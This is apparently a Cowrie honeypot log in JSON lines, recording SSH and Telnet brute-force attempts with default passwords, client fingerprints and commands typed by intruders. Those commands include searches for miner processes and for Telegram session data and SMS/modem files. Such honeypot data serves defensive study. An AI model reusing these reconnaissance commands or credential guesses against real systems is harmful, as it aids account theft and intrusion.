{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:35:11.008277Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:35:11.727053Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.command.input","input":"ps | grep '[Mm]iner'","message":"CMD: ps | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-28T17:35:11.727746Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","size":0,"shasum":"4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:35:12.058868Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:35:12.777800Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.command.input","input":"ps -ef | grep '[Mm]iner'","message":"CMD: ps -ef | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-28T17:35:12.778489Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","size":0,"shasum":"e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:35:13.121296Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:35:14.217333Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.command.input","input":"ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","message":"CMD: ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","sensor":"my-vps","timestamp":"2025-08-28T17:35:14.218048Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","size":794,"shasum":"722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:35:14.551584Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:35:15.230539Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.command.input","input":"locate D877F783D5D3EF8Cs","message":"CMD: locate D877F783D5D3EF8Cs","sensor":"my-vps","timestamp":"2025-08-28T17:35:15.231255Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","size":0,"shasum":"3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:35:15.594598Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:35:16.281701Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.command.input","input":"echo Hi | cat -n","message":"CMD: echo Hi | cat -n","sensor":"my-vps","timestamp":"2025-08-28T17:35:16.282722Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","size":11,"shasum":"3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:35:16.620336Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43756,"dst_ip":"1.2.3.4","dst_port":22,"session":"d50bf08fb4cb","protocol":"ssh","message":"New connection: 212.227.125.160:43756 (1.2.3.4:22) [session: d50bf08fb4cb]","sensor":"my-vps","timestamp":"2025-08-28T17:35:28.477003Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:35:29.538946Z","src_ip":"212.227.235.229","session":"1e30b4877852"}
{"eventid":"cowrie.session.closed","duration":180.21233773231506,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:35:29.543231Z","src_ip":"212.227.235.229","session":"1e30b4877852"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.220","src_port":45376,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b84380aa9db","protocol":"ssh","message":"New connection: 171.243.150.220:45376 (1.2.3.4:22) [session: 9b84380aa9db]","sensor":"my-vps","timestamp":"2025-08-28T17:35:32.654957Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:35:36.590976Z","src_ip":"171.243.150.220","session":"9b84380aa9db"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:35:37.567773Z","src_ip":"171.243.150.220","session":"9b84380aa9db"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T17:35:40.727610Z","src_ip":"171.243.150.220","session":"9b84380aa9db"}
{"eventid":"cowrie.session.closed","duration":"14.8","message":"Connection lost after 14.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:35:47.461379Z","src_ip":"171.243.150.220","session":"9b84380aa9db"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:35:50.763129Z","src_ip":"212.227.125.160","session":"d50bf08fb4cb"}
{"eventid":"cowrie.session.closed","duration":"25.0","message":"Connection lost after 25.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:35:53.508773Z","src_ip":"212.227.125.160","session":"d50bf08fb4cb"}
{"eventid":"cowrie.session.closed","duration":"50.7","message":"Connection lost after 50.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:35:53.861118Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.220","src_port":60036,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8fc8ca64728","protocol":"ssh","message":"New connection: 171.243.150.220:60036 (1.2.3.4:22) [session: d8fc8ca64728]","sensor":"my-vps","timestamp":"2025-08-28T17:35:57.224911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:35:57.225811Z","src_ip":"171.243.150.220","session":"d8fc8ca64728"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:35:57.431646Z","src_ip":"171.243.150.220","session":"d8fc8ca64728"}
{"eventid":"cowrie.login.failed","username":"installer","password":"installer","message":"login attempt [installer/installer] failed","sensor":"my-vps","timestamp":"2025-08-28T17:36:04.135559Z","src_ip":"171.243.150.220","session":"d8fc8ca64728"}
{"eventid":"cowrie.session.connect","src_ip":"77.90.185.47","src_port":45352,"dst_ip":"1.2.3.4","dst_port":22,"session":"39c0eb066870","protocol":"ssh","message":"New connection: 77.90.185.47:45352 (1.2.3.4:22) [session: 39c0eb066870]","sensor":"my-vps","timestamp":"2025-08-28T17:36:05.450696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:36:05.473900Z","src_ip":"77.90.185.47","session":"39c0eb066870"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T17:36:05.474728Z","src_ip":"77.90.185.47","session":"39c0eb066870"}
{"eventid":"cowrie.login.failed","username":"opnsense","password":"opnsense","message":"login attempt [opnsense/opnsense] failed","sensor":"my-vps","timestamp":"2025-08-28T17:36:05.716362Z","src_ip":"77.90.185.47","session":"39c0eb066870"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:36:06.988252Z","src_ip":"77.90.185.47","session":"39c0eb066870"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49388,"dst_ip":"1.2.3.4","dst_port":23,"session":"cbcaef9eabbb","protocol":"telnet","message":"New connection: 212.227.235.229:49388 (1.2.3.4:23) [session: cbcaef9eabbb]","sensor":"my-vps","timestamp":"2025-08-28T17:36:07.824490Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38464,"dst_ip":"1.2.3.4","dst_port":22,"session":"f00a69423294","protocol":"ssh","message":"New connection: 212.227.235.229:38464 (1.2.3.4:22) [session: f00a69423294]","sensor":"my-vps","timestamp":"2025-08-28T17:36:08.125110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:36:08.126186Z","src_ip":"212.227.235.229","session":"f00a69423294"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T17:36:08.232720Z","src_ip":"212.227.235.229","session":"f00a69423294"}
{"eventid":"cowrie.login.failed","username":"node","password":"node","message":"login attempt [node/node] failed","sensor":"my-vps","timestamp":"2025-08-28T17:36:08.555209Z","src_ip":"212.227.235.229","session":"f00a69423294"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:36:09.663793Z","src_ip":"212.227.235.229","session":"f00a69423294"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48141,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1fd05c3bf55","protocol":"ssh","message":"New connection: 212.227.235.229:48141 (1.2.3.4:22) [session: c1fd05c3bf55]","sensor":"my-vps","timestamp":"2025-08-28T17:36:13.939874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T17:36:13.940886Z","src_ip":"212.227.235.229","session":"c1fd05c3bf55"}
{"eventid":"cowrie.session.closed","duration":"16.7","message":"Connection lost after 16.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:36:13.947134Z","src_ip":"171.243.150.220","session":"d8fc8ca64728"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T17:36:14.071140Z","src_ip":"212.227.235.229","session":"c1fd05c3bf55"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"frappe","message":"login attempt [frappe/frappe] failed","sensor":"my-vps","timestamp":"2025-08-28T17:36:14.685654Z","src_ip":"212.227.235.229","session":"c1fd05c3bf55"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"123456","message":"login attempt [frappe/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T17:36:15.827709Z","src_ip":"212.227.235.229","session":"c1fd05c3bf55"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"12345","message":"login attempt [frappe/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T17:36:16.959500Z","src_ip":"212.227.235.229","session":"c1fd05c3bf55"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"abc123","message":"login attempt [frappe/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T17:36:18.099273Z","src_ip":"212.227.235.229","session":"c1fd05c3bf55"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"abcd123","message":"login attempt [frappe/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T17:36:19.231256Z","src_ip":"212.227.235.229","session":"c1fd05c3bf55"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:36:20.366496Z","src_ip":"212.227.235.229","session":"c1fd05c3bf55"}
{"eventid":"cowrie.session.closed","duration":15.302302122116089,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:36:23.126716Z","src_ip":"212.227.235.229","session":"cbcaef9eabbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38300,"dst_ip":"1.2.3.4","dst_port":23,"session":"f418b5c0f119","protocol":"telnet","message":"New connection: 212.227.235.229:38300 (1.2.3.4:23) [session: f418b5c0f119]","sensor":"my-vps","timestamp":"2025-08-28T17:36:26.290538Z"}
{"eventid":"cowrie.session.closed","duration":3.2771859169006348,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:36:29.567654Z","src_ip":"212.227.235.229","session":"f418b5c0f119"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58586,"dst_ip":"1.2.3.4","dst_port":23,"session":"60b622402167","protocol":"telnet","message":"New connection: 212.227.235.229:58586 (1.2.3.4:23) [session: 60b622402167]","sensor":"my-vps","timestamp":"2025-08-28T17:36:32.901112Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49366,"dst_ip":"1.2.3.4","dst_port":23,"session":"1fd45d48a16b","protocol":"telnet","message":"New connection: 212.227.235.229:49366 (1.2.3.4:23) [session: 1fd45d48a16b]","sensor":"my-vps","timestamp":"2025-08-28T17:36:42.767731Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:36:42.954916Z","src_ip":"212.227.235.229","session":"1fd45d48a16b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:36:42.984661Z","src_ip":"212.227.235.229","session":"1fd45d48a16b"}
{"eventid":"cowrie.session.closed","duration":10.161765098571777,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:36:43.062856Z","src_ip":"212.227.235.229","session":"60b622402167"}
